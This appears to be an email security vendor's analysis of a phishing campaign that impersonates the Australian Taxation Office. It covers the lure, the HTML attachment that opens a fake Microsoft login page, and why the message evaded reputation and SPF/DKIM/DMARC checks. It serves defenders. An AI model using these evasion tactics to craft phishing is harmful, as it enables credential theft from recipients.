Impersonating the Australian Taxation Office, this attack informs the email recipient they have received a new funds transfer and advises them that the payment is currently on hold due to a necessary identity verification. Attached to the email is a supposed payment slip with additional details about the payment. The email was sent from a maliciously registered domain, with a Gmail reply-to email address.  At the bottom of the email, the Australian Government Tax Office logo reinforces the theme and makes the phishing email appear more legitimate.

Status Bar Dots
ATO phishing email

When a recipient opens the referenced attachment, they are presented with a Microsoft phishing page that has pre-populated their email address and states that their password needs to be verified “because you’re accessing sensitive info.”

Status Bar Dots
HTML attachment phishing page

Why It Bypassed Traditional Security

The URL found within the HTML attachment is one that has not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators.  The email’s reply-to address is sent from a Gmail account, a free webmail service available to anyone. As a result, there is no bad domain reputation for traditional security providers to discover, and the email passes all authentication checks for SPF, DKIM, and DMARC.

Detecting the Attack

HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. An analysis of the HTML file identified a URL that had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. In addition to understanding the intent of the link, a cloud email security platform analyzes the content of the email to determine whether it is malicious.

Risk to Organization

As soon as an employee enters their credentials, attackers have access to their email accounts, which can be used to gather sensitive information or to launch attacks on coworkers, customers, or vendors.

Analysis Overview

Vector

Payload-based

Goal

Credential Theft

Tactic

Free Webmail Account
Spoofed Display Name

Theme

Account Verification
Fake Payment Receipt

Impersonated Brands

Australian Taxation Office